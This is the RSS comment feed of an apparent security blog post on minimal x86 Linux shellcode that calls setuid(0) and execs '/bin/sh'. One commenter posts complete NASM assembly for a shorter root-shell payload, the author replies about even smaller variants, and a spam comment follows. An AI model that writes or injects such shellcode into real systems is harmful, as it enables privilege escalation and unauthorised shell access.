Comments on: Smallest GNU/Linux x86 setuid(0) & exec(“/bin/sh”,0,0) Stable shellcode – 28 bytes http://opensec.es/2008/11/26/gnulinux-setuid0-execbinsh00-stable/ Development & Security Research Thu, 01 Sep 2011 23:30:12 +0000 hourly 1 http://wordpress.org/?v=3.3 By: sch3m4 http://opensec.es/2008/11/26/gnulinux-setuid0-execbinsh00-stable/comment-page-1/#comment-10417 sch3m4 Sun, 25 Apr 2010 19:22:04 +0000 http://opensec.es/?p=134#comment-10417 I'm sorry, I've been offline for a long time. About your comment, I haven't tested it however if it always works taking care about registry contents (garbage), could be valid. On the other hand, it's possible to do it smaller, I remember versions made by vlan7 or me about 24/25 bytes, but unstable. Good work ;) I’m sorry, I’ve been offline for a long time.

About your comment, I haven’t tested it however if it always works taking care about registry contents (garbage), could be valid.

On the other hand, it’s possible to do it smaller, I remember versions made by vlan7 or me about 24/25 bytes, but unstable.

Good work ;)

]]> By: Tom Madsen http://opensec.es/2008/11/26/gnulinux-setuid0-execbinsh00-stable/comment-page-1/#comment-10078 Tom Madsen Mon, 08 Mar 2010 00:23:01 +0000 http://opensec.es/?p=134#comment-10078 Wouldn't: bits 32 global _start section .text _start: xor ebx,ebx push byte 23 runit: pop eax cdq int 0x80 xor ecx,ecx push ecx push 0x68732f6e push 0x69622f2f mov ebx,esp push byte 11 jmp short runit be one byte shorter? Wouldn’t:

bits 32
global _start
section .text
_start:
xor ebx,ebx
push byte 23
runit:
pop eax
cdq
int 0×80
xor ecx,ecx
push ecx
push 0x68732f6e
push 0x69622f2f
mov ebx,esp
push byte 11
jmp short runit

be one byte shorter?

]]> By: payday loans http://opensec.es/2008/11/26/gnulinux-setuid0-execbinsh00-stable/comment-page-1/#comment-9863 payday loans Sun, 14 Feb 2010 03:04:27 +0000 http://opensec.es/?p=134#comment-9863 I am very impressed with the article I have just read. I wish the writer of opensec.es can continue to provide so much worthwhile information and unforgettable experience to opensec.es readers. There is not much to state except the following universal truth: A person who says something is impossible is usually interrupted by the person doing it. I will be back. I am very impressed with the article I have just read. I wish the writer of opensec.es can continue to provide so much worthwhile information and unforgettable experience to opensec.es readers. There is not much to state except the following universal truth: A person who says something is impossible is usually interrupted by the person doing it. I will be back.

]]>